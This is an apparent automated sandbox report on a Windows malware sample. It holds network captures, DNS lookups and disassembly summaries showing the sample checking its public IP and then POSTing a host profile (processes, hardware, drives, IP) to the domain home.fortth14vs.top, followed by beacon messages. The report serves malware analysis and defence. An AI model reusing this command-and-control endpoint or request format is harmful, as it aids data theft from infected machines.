                                    Dec 31, 2024 15:42:00.198250055 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.198282003 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.198297977 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.198306084 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.198323965 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.198334932 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.198378086 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.198395014 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.198410034 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.198417902 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.198432922 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.198441029 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.198451042 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.198477983 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.198508978 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.198519945 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.198538065 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.198546886 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.198554993 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.198564053 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.198579073 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.198587894 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.198596001 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:02.480638027 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:02.481158018 CET4970680192.168.2.934.147.147.173
                                    Dec 31, 2024 15:42:02.486238003 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:02.486311913 CET4970680192.168.2.934.147.147.173
                                    Dec 31, 2024 15:42:03.141534090 CET4970780192.168.2.934.147.147.173
                                    Dec 31, 2024 15:42:03.146378040 CET804970734.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:03.146470070 CET4970780192.168.2.934.147.147.173
                                    Dec 31, 2024 15:42:03.147456884 CET4970780192.168.2.934.147.147.173
                                    Dec 31, 2024 15:42:03.152193069 CET804970734.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:03.782170057 CET804970734.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:03.782730103 CET4970780192.168.2.934.147.147.173
                                    Dec 31, 2024 15:42:03.787748098 CET804970734.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:03.787803888 CET4970780192.168.2.934.147.147.173
                                    Dec 31, 2024 15:42:04.579063892 CET4970880192.168.2.934.147.147.173
                                    Dec 31, 2024 15:42:04.583889008 CET804970834.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:04.583957911 CET4970880192.168.2.934.147.147.173
                                    Dec 31, 2024 15:42:04.584219933 CET4970880192.168.2.934.147.147.173
                                    Dec 31, 2024 15:42:04.588992119 CET804970834.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:05.292166948 CET804970834.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:05.292814970 CET4970880192.168.2.934.147.147.173
                                    Dec 31, 2024 15:42:05.297902107 CET804970834.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:05.297959089 CET4970880192.168.2.934.147.147.173
                                    TimestampSource PortDest PortSource IPDest IP
                                    Dec 31, 2024 15:41:57.403222084 CET5559653192.168.2.91.1.1.1
                                    Dec 31, 2024 15:41:57.403340101 CET5559653192.168.2.91.1.1.1
                                    Dec 31, 2024 15:41:57.410196066 CET53555961.1.1.1192.168.2.9
                                    Dec 31, 2024 15:41:57.410262108 CET53555961.1.1.1192.168.2.9
                                    Dec 31, 2024 15:41:59.217747927 CET5559953192.168.2.91.1.1.1
                                    Dec 31, 2024 15:41:59.217869997 CET5559953192.168.2.91.1.1.1
                                    Dec 31, 2024 15:41:59.729695082 CET53555991.1.1.1192.168.2.9
                                    Dec 31, 2024 15:41:59.729741096 CET53555991.1.1.1192.168.2.9
                                    Dec 31, 2024 15:42:02.672317028 CET5560153192.168.2.91.1.1.1
                                    Dec 31, 2024 15:42:02.674532890 CET5560153192.168.2.91.1.1.1
                                    Dec 31, 2024 15:42:03.140379906 CET53556011.1.1.1192.168.2.9
                                    Dec 31, 2024 15:42:03.140400887 CET53556011.1.1.1192.168.2.9
                                    Dec 31, 2024 15:42:03.838474035 CET5560353192.168.2.91.1.1.1
                                    Dec 31, 2024 15:42:03.838521004 CET5560353192.168.2.91.1.1.1
                                    Dec 31, 2024 15:42:04.456136942 CET53556031.1.1.1192.168.2.9
                                    Dec 31, 2024 15:42:04.578126907 CET53556031.1.1.1192.168.2.9
Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                 Type            Class        DNS over HTTPS
Dec 31, 2024 15:41:57.403222084 CET  192.168.2.9  1.1.1.1  0xa13a    Standard query (0)  httpbin.org          A (IP address)  IN (0x0001)  false
Dec 31, 2024 15:41:57.403340101 CET  192.168.2.9  1.1.1.1  0x9200    Standard query (0)  httpbin.org          28              IN (0x0001)  false
Dec 31, 2024 15:41:59.217747927 CET  192.168.2.9  1.1.1.1  0x6b57    Standard query (0)  home.fortth14vs.top  A (IP address)  IN (0x0001)  false
Dec 31, 2024 15:41:59.217869997 CET  192.168.2.9  1.1.1.1  0xc9e5    Standard query (0)  home.fortth14vs.top  28              IN (0x0001)  false
Dec 31, 2024 15:42:02.672317028 CET  192.168.2.9  1.1.1.1  0x2703    Standard query (0)  home.fortth14vs.top  A (IP address)  IN (0x0001)  false
Dec 31, 2024 15:42:02.674532890 CET  192.168.2.9  1.1.1.1  0xc3ba    Standard query (0)  home.fortth14vs.top  28              IN (0x0001)  false
Dec 31, 2024 15:42:03.838474035 CET  192.168.2.9  1.1.1.1  0x2263    Standard query (0)  home.fortth14vs.top  A (IP address)  IN (0x0001)  false
Dec 31, 2024 15:42:03.838521004 CET  192.168.2.9  1.1.1.1  0xfeb3    Standard query (0)  home.fortth14vs.top  28              IN (0x0001)  false
Timestamp                            Source IP  Dest IP      Trans ID  Reply Code    Name                        CName                  Address         Type                    Class        DNS over HTTPS
Dec 31, 2024 15:41:57.410262108 CET  1.1.1.1    192.168.2.9  0xa13a    No error (0)  httpbin.org                 -                      34.200.57.114   A (IP address)          IN (0x0001)  false
Dec 31, 2024 15:41:57.410262108 CET  1.1.1.1    192.168.2.9  0xa13a    No error (0)  httpbin.org                 -                      34.197.122.172  A (IP address)          IN (0x0001)  false
Dec 31, 2024 15:41:59.729741096 CET  1.1.1.1    192.168.2.9  0x6b57    No error (0)  home.fortth14vs.top         -                      34.147.147.173  A (IP address)          IN (0x0001)  false
Dec 31, 2024 15:42:03.140379906 CET  1.1.1.1    192.168.2.9  0x2703    No error (0)  home.fortth14vs.top         -                      34.147.147.173  A (IP address)          IN (0x0001)  false
Dec 31, 2024 15:42:04.456136942 CET  1.1.1.1    192.168.2.9  0x2263    No error (0)  home.fortth14vs.top         -                      34.147.147.173  A (IP address)          IN (0x0001)  false
Dec 31, 2024 15:42:12.075968981 CET  1.1.1.1    192.168.2.9  0x60a2    No error (0)  fp2e7a.wpc.2be4.phicdn.net  fp2e7a.wpc.phicdn.net  -               CNAME (Canonical name)  IN (0x0001)  false
Dec 31, 2024 15:42:12.075968981 CET  1.1.1.1    192.168.2.9  0x60a2    No error (0)  fp2e7a.wpc.phicdn.net       -                      192.229.221.95  A (IP address)          IN (0x0001)  false
                                    • httpbin.org
                                    • home.fortth14vs.top
Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.9  49706        34.147.147.173  80                7132  C:\Users\user\Desktop\Bo6uO5gKL4.exe
Timestamp: Dec 31, 2024 15:41:59.750154018 CET
Bytes transferred: 12360
Direction: OUT
Data:
POST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1
Host: home.fortth14vs.top
Accept: */*
Content-Type: application/json
Content-Length: 444098
                                    Data Ascii: { "ip": "8.46.123.189", "current_time": "8485909137206805172", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 26, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 328 }, { "name": "csrss.exe", "pid": 412 }, { "name": "wininit.exe", "pid": 488 }, { "name": "csrss.exe", "pid": 496 }, { "name": "winlogon.exe", "pid": 584 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 640 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 880 }, { "name": "svchost.exe", "pid": 928 }, { "name": "dwm.exe", "pid": 992 }, { "name": "svchost.exe", "pid": 436 }, { "name": "svchost.exe", "pid": 376 }, { "name": "svchost.exe", "pid": 792 }, { "name": "svchost.exe" [TRUNCATED]
                                    Data Ascii: 7PrZPhKFajHBVKNFVZUIqGGhhKdLD03SjVlTn7DDzr4ShUlTq4vC06v5Hm\/hb4oUcgoce51w\/nEskzyj\/AGnRz\/G4nD4mWYwr4meHjiJueLq42riMViKOKdCFan9ZxcMFmOIowq0cux9Wh6HJYzKPlTen0+uepHb61CYnU4ZSv1FT2eo2t1GJtPura6hOMS2s8VxGfTEkTMpyPfp7VqW91YyXVja6zrWi+HrC6vIbW78R+I
                                    Dec 31, 2024 15:41:59.760042906 CET2472OUTData Raw: 30 43 35 75 72 72 51 50 45 4e 6e 6f 64 7a 63 51 44 58 64 42 75 72 2b 77 30 75 2b 6d 30 58 56 6f 72 66 37 64 70 63 31 5c 2f 70 6d 6e 33 6a 32 55 30 4c 33 56 6a 61 54 46 34 49 2b 31 38 53 36 56 70 48 68 7a 77 78 72 47 74 4a 38 56 50 67 35 34 69 38
                                    Data Ascii: 0C5urrQPENnodzcQDXdBur+w0u+m0XVorf7dpc1\/pmn3j2U0L3VjaTF4I+18S6VpHhzwxrGtJ8VPg54i8T+Fvgl8J\/wBozxp8JfD+s\/ExPid4P+DPxkm8C23hTxpqa+JvhH4Z+Gur29rdfEnwXb+IdN8HfEzxRq+j\/wBtxXL2M1hbX93ae5m\/iFwZkGHyPFZzxBg8uw\/Ekqcckq4iOIjHHe1orERnG1FujSjQftqtXEqj
                                    Dec 31, 2024 15:41:59.760099888 CET2472OUTData Raw: 6b 4b 6d 6f 6f 41 72 30 55 5c 2f 59 66 62 5c 2f 41 44 2b 46 4e 4b 6c 66 5c 2f 72 55 48 51 4a 56 65 72 46 51 6e 71 5c 2f 34 5c 2f 2b 68 43 67 30 70 39 66 6c 2b 6f 32 71 39 57 4b 4b 44 51 71 62 66 6d 7a 32 36 5c 2f 6a 5c 2f 6e 6e 39 4b 69 71 33 49
                                    Data Ascii: kKmooAr0U\/Yfb\/AD+FNKlf\/rUHQJVerFQnq\/4\/+hCg0p9fl+o2q9WKKDQqbfmz26\/j\/nn9Kiq3Iv3Pbn644plB0FV\/un8P5ioatbG9P5f40bG9P5f40F878v6+ZQw\/v+f\/ANel8v3\/AE\/+vViRX7D6f4+\/t1\/nUdBqV6Klfp+P9DTOUPbkf59KDT2nl+P\/AACB+v4UyrFRbD7f5\/Cg7CpTH6fj\/Q1P5T+n
                                    Dec 31, 2024 15:42:02.480638027 CET | 138 | IN | HTTP/1.1 200 OK
                                    server: nginx/1.22.1
                                    date: Tue, 31 Dec 2024 14:42:02 GMT
                                    content-type: text/html; charset=utf-8
                                    content-length: 1
                                    Data Raw: 30
                                    Data Ascii: 0


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    1 | 192.168.2.9 | 49707 | 34.147.147.173 | 80 | 7132 | C:\Users\user\Desktop\Bo6uO5gKL4.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Dec 31, 2024 15:42:03.147456884 CET | 99 | OUT | GET /gduZhxVRrNSTmMahdBGb1735537738?argument=0 HTTP/1.1
                                    Host: home.fortth14vs.top
                                    Accept: */*
                                    Dec 31, 2024 15:42:03.782170057 CET | 353 | IN | HTTP/1.1 404 NOT FOUND
                                    server: nginx/1.22.1
                                    date: Tue, 31 Dec 2024 14:42:03 GMT
                                    content-type: text/html; charset=utf-8
                                    content-length: 207
                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                    Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    2 | 192.168.2.9 | 49708 | 34.147.147.173 | 80 | 7132 | C:\Users\user\Desktop\Bo6uO5gKL4.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Dec 31, 2024 15:42:04.584219933 CET | 172 | OUT | POST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1
                                    Host: home.fortth14vs.top
                                    Accept: */*
                                    Content-Type: application/json
                                    Content-Length: 31
                                    Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                    Data Ascii: { "id1": "0", "data": "Done1" }
                                    Dec 31, 2024 15:42:05.292166948 CET | 353 | IN | HTTP/1.1 404 NOT FOUND
                                    server: nginx/1.22.1
                                    date: Tue, 31 Dec 2024 14:42:05 GMT
                                    content-type: text/html; charset=utf-8
                                    content-length: 207
                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                    Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    0 | 192.168.2.9 | 49705 | 34.200.57.114 | 443 | 7132 | C:\Users\user\Desktop\Bo6uO5gKL4.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    2024-12-31 14:41:58 UTC | 52 | OUT | GET /ip HTTP/1.1
                                    Host: httpbin.org
                                    Accept: */*
                                    2024-12-31 14:41:58 UTC | 224 | IN | HTTP/1.1 200 OK
                                    Date: Tue, 31 Dec 2024 14:41:58 GMT
                                    Content-Type: application/json
                                    Content-Length: 31
                                    Connection: close
                                    Server: gunicorn/19.9.0
                                    Access-Control-Allow-Origin: *
                                    Access-Control-Allow-Credentials: true
                                    2024-12-31 14:41:58 UTC | 31 | IN | Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                    Data Ascii: { "origin": "8.46.123.189"}



                                    Target ID:0
                                    Start time:09:41:53
                                    Start date:31/12/2024
                                    Path:C:\Users\user\Desktop\Bo6uO5gKL4.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\Bo6uO5gKL4.exe"
                                    Imagebase:0x580000
                                    File size:4'494'336 bytes
                                    MD5 hash:935D1FE58326C50F930C94E3493B266C
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:true


                                      Execution Graph

                                      Execution Coverage:2.4%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:19%
                                      Total number of Nodes:459
                                      Total number of Limit Nodes:72
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1674269432.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                      • Associated: 00000000.00000002.1674245746.0000000000580000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674269432.0000000000CC6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674269432.0000000000CC8000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674778943.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000000CCD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000000E59000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000000F6B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000000F6E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.000000000104E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000001055000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000001065000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1675120416.0000000001066000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1675239121.0000000001221000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1675257923.0000000001223000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
                                      • API String ID: 0-1590685507
                                      • Opcode ID: a3438837f4714536e5724e5384ed37833d22e402ab36b3184e273b0a2799e500
                                      • Instruction ID: e23b4bd28bdcec606094370b93c3bf33bb179a82892d43563b650a3868a5d670
                                      • Opcode Fuzzy Hash: a3438837f4714536e5724e5384ed37833d22e402ab36b3184e273b0a2799e500
                                      • Instruction Fuzzy Hash: 3BC29231A043459FD714CF29C985BAABBE1BF84314F05CA6DEC989B262D771ED84CB81

                                      Control-flow Graph

                                      APIs
                                      • GetSystemInfo.KERNELBASE ref: 00582579
                                      • GlobalMemoryStatusEx.KERNELBASE ref: 005825CC
                                      • GetDriveTypeA.KERNELBASE ref: 00582647
                                      • GetDiskFreeSpaceExA.KERNELBASE ref: 0058267E
                                      • KiUserCallbackDispatcher.NTDLL ref: 005827E2
                                      • SHGetKnownFolderPath.SHELL32 ref: 0058286D
                                      • FindFirstFileW.KERNELBASE ref: 005828F8
                                      • FindNextFileW.KERNELBASE ref: 0058291F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1674269432.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
• Associated: 00000000.00000002.1674245746.0000000000580000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1674269432.0000000000CC6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1674269432.0000000000CC8000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1674778943.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1674797118.0000000000CCD000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1674797118.0000000000E59000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1674797118.0000000000F6B000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1674797118.0000000000F6E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1674797118.000000000104E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1674797118.0000000001055000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1674797118.0000000001065000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675120416.0000000001066000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675239121.0000000001221000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675257923.0000000001223000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID: FileFind$CallbackDiskDispatcherDriveFirstFolderFreeGlobalInfoKnownMemoryNextPathSpaceStatusSystemTypeUser
                                      • String ID: ;%X$@$`
                                      • API String ID: 2066228396-1925365209
                                      • Opcode ID: af25ec571cfb6bd6d9a41d8cbd1f9ec8b61916b982f251a34b12abe310b051e1
                                      • Instruction ID: f2beaaa0719cd67839736bd419d6b3b67424c4846eaf0b5af7ee946316dd9d5a
                                      • Opcode Fuzzy Hash: af25ec571cfb6bd6d9a41d8cbd1f9ec8b61916b982f251a34b12abe310b051e1
                                      • Instruction Fuzzy Hash: 84D193B49053099FCB10EF68C5857AEBBF0BF48344F008969E898D7351E7359A84CF92

Control-flow Graph
• Function entry: 005829FF (interactive graph rendering not reproduced; blocks were marked executed / not executed)
• API calls on the graph: FindFirstFileA, RegOpenKeyExA, CharUpperA, QueryFullProcessImageNameA, CloseHandle
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1674269432.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
• Associated: same 15 dump files as listed under the first Memory Dump Source above
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                      • String ID: 0
                                      • API String ID: 2406880114-4108050209
                                      • Opcode ID: bf3194938e7de7c79ecd13adb9defc261bd122a15f801c5bf3dbd4f1e1b848c4
                                      • Instruction ID: 71d368680755e0bc1810677866ae39f3dfad47c3ce47865d755de18af41a9b09
                                      • Opcode Fuzzy Hash: bf3194938e7de7c79ecd13adb9defc261bd122a15f801c5bf3dbd4f1e1b848c4
                                      • Instruction Fuzzy Hash: 46E1C4B49053059FCB10EF68DA857AEBBF5BF54344F0088A9E898E7350E774D9898F42

Control-flow Graph
• Function entry: 005905B0 (interactive graph rendering not reproduced; blocks were marked executed / not executed)
• API calls on the graph: WSAEventSelect, WSAEnumNetworkEvents
                                      APIs
                                      • WSAEventSelect.WS2_32(?,?,?), ref: 00590711
                                      • WSAEventSelect.WS2_32(?,?,00000000), ref: 005909DD
                                      • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 005909FB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1674269432.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
• Associated: same 15 dump files as listed under the first Memory Dump Source above
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID: EventSelect$EnumEventsNetwork
                                      • String ID: N=X$multi.c
                                      • API String ID: 2170980988-1470746878
                                      • Opcode ID: 65bc1150e706c17981bb5b67deef99e54bde20ac00d19e55e64d4c1d44d7dd7d
                                      • Instruction ID: b4574019a35732da687ea4a505cf248dc8e928d1ee89d269bb825bd2c6de0655
                                      • Opcode Fuzzy Hash: 65bc1150e706c17981bb5b67deef99e54bde20ac00d19e55e64d4c1d44d7dd7d
                                      • Instruction Fuzzy Hash: 52D1CF716083069FEB10DF64C885BABBBE9FF84354F045C2CF89492292E774E945DB92

Control-flow Graph
• Function entry: 0064B180 (interactive graph rendering not reproduced; blocks were marked executed / not executed)
• API calls on the graph: getsockname
                                      APIs
                                      • getsockname.WS2_32(-00000020,-00000020,?), ref: 0064B2B7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1674269432.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
• Associated: same 15 dump files as listed under the first Memory Dump Source above
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID: getsockname
                                      • String ID: ares__sortaddrinfo.c$cur != NULL
                                      • API String ID: 3358416759-2430778319
                                      • Opcode ID: 333d0699e6f1facb5f5b66d8a1b24b16b82511f0840154b1e1f9092cd4caf1d6
                                      • Instruction ID: a1b9fe26392e0c98c4b0dc1796c5f10f779d177932223d2d7bf9ac6ad9903fdd
                                      • Opcode Fuzzy Hash: 333d0699e6f1facb5f5b66d8a1b24b16b82511f0840154b1e1f9092cd4caf1d6
                                      • Instruction Fuzzy Hash: 90C17E716043159FDB18DF24C890A6AB7E2FF89314F05996CF8498B3A2DB71ED45CB81
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1674269432.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
• Associated: same 15 dump files as listed under the first Memory Dump Source above
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7a912b35f3219386fe7117105ebb2facd7509ae0fe03dff7b2e1d324390f2552
                                      • Instruction ID: b3fdbc3d878bee1f3bb5b9e712bb1aee75dacb98c050d1505a8cc7fae6b7fab9
                                      • Opcode Fuzzy Hash: 7a912b35f3219386fe7117105ebb2facd7509ae0fe03dff7b2e1d324390f2552
                                      • Instruction Fuzzy Hash: 2291043062D30D8BDB358B6988847BBBAD5FFC8324F148B2DE899471D4E7759C40E691
                                      APIs
                                      • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,0063712E,?,?,?,00001001,00000000), ref: 0064A90D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1674269432.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
• Associated: same 15 dump files as listed under the first Memory Dump Source above
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID: recvfrom
                                      • String ID:
                                      • API String ID: 846543921-0
                                      • Opcode ID: 653bcbfe545fb3c783077bf804c0a11b8acb189214964e360aeb2b1fde8c1938
                                      • Instruction ID: 46e152d6e304ab40b08631d743e0e29df29cb6ac1190acd4e6462b58b685c9d5
                                      • Opcode Fuzzy Hash: 653bcbfe545fb3c783077bf804c0a11b8acb189214964e360aeb2b1fde8c1938
                                      • Instruction Fuzzy Hash: 4EF01D75118348BFD2209E41DC48DBBBBEDEFCA754F05495DF958133119271AE11CAB2
                                      APIs
                                      • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 0063AA19
                                      • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0063AA4C
                                      • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 0063AA97
                                      • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0063AAE9
                                      • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0063AB30
                                      • RegCloseKey.KERNELBASE(?), ref: 0063AB6A
                                      • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 0063AB82
